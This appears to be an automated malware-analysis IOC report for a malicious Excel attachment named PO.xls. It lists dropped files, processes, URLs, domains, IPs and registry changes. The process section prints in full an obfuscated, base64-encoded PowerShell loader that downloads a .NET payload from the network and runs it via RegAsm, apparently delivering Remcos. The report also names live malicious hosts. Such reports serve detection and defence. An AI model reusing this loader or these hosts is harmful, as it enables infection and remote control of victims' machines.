IOC Report
PO.xls

loading gif

Files

File Path
Type
Category
Malicious
PO.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Sep 27 10:09:48 2024, Security: 1
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{91BCF8F6-C2FD-4749-855D-C3013FC0B30C}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a9ifFT.url
MS Windows 95 Internet shortcut text (URL=<https://strmr.co/a9ifFT>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\strmr.co.url
MS Windows 95 Internet shortcut text (URL=<https://strmr.co/>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\PO.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Sep 27 11:52:06 2024, Security: 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson[1].doc
Rich Text Format data, version 1
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nicepicturewithyourebodygreen[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C750F4.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C899BC08.doc
Rich Text Format data, version 1
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBFF10C7.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4D4D2FF.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1361791.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{28600D33-AC1C-42C0-9BBC-37F26F622114}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E77CF0E5-2D57-4B70-B1CD-79089E891866}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\2b3sh2g3.k5x.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\3cvvougz.gd4.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\unfdpjy4.2z5.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zl4k3cti.br0.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{3D69CD18-9C69-4A75-B17F-F7E558D156C8}
data
dropped
C:\Users\user\AppData\Local\Temp\{D4F2A336-45A1-400E-A092-503662D6E61A}
data
dropped
C:\Users\user\AppData\Local\Temp\~DF59A7707E25171593.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF73D3CB013F39347A.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFCE2419FB28151868.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DFEB8E67A7BEDB9502.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [xls]
modified
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\62830000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Sep 27 11:52:06 2024, Security: 1
dropped
C:\Users\user\Desktop\62830000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 23 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious

URLs

Name
IP
Malicious
http://104.168.32.148/550/RWEER.txt
104.168.32.148
malicious
http://104.168.32.148/550/ed/enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson.doc
104.168.32.148
malicious
http://104.168.32.148/550/nicepicturewithyourebodygreen.tIF
104.168.32.148
malicious
ramcxx.duckdns.org
malicious
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.108.133
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFj
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://104.168.32.148
unknown
http://go.micros
unknown
http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFVtnp
unknown
http://geoplugin.net/json.gp
unknown
http://104.168.32.148/550/nicepicturewithyourebodygreen.tIFFtnp
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://strmr.co/a9ifFT
172.67.179.215
https://raw.githubusercontent.com
unknown
http://geoplugin.net/json.gp/C
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://strmr.co/
unknown
https://strmr.co/a9ifFTN
unknown
https://strmr.co/a9ifFTyX
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfq4;
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
http://crl.entrust.net/2048ca.crl0
unknown
There are 22 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
strmr.co
172.67.179.215
malicious
ramcxx.duckdns.org
45.134.140.68
malicious
raw.githubusercontent.com
185.199.108.133

IPs

IP
Domain
Country
Malicious
172.67.179.215
strmr.co
United States
malicious
104.168.32.148
unknown
United States
malicious
45.134.140.68
ramcxx.duckdns.org
Georgia
malicious
185.199.108.133
raw.githubusercontent.com
Netherlands
104.21.64.88
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
j2/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\29EDE
29EDE
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
68/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\388CF
388CF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38B3F
38B3F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38BFA
38BFA
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common
QMSessionCount
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\General
LastAutoSavePurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38B3F
38B3F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
`k0
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
+l0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://strmr.co/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://strmr.co/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://strmr.co/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://strmr.co/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://strmr.co/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://strmr.co/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://strmr.co/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://strmr.co/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://strmr.co/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
.x0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\33572
33572
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
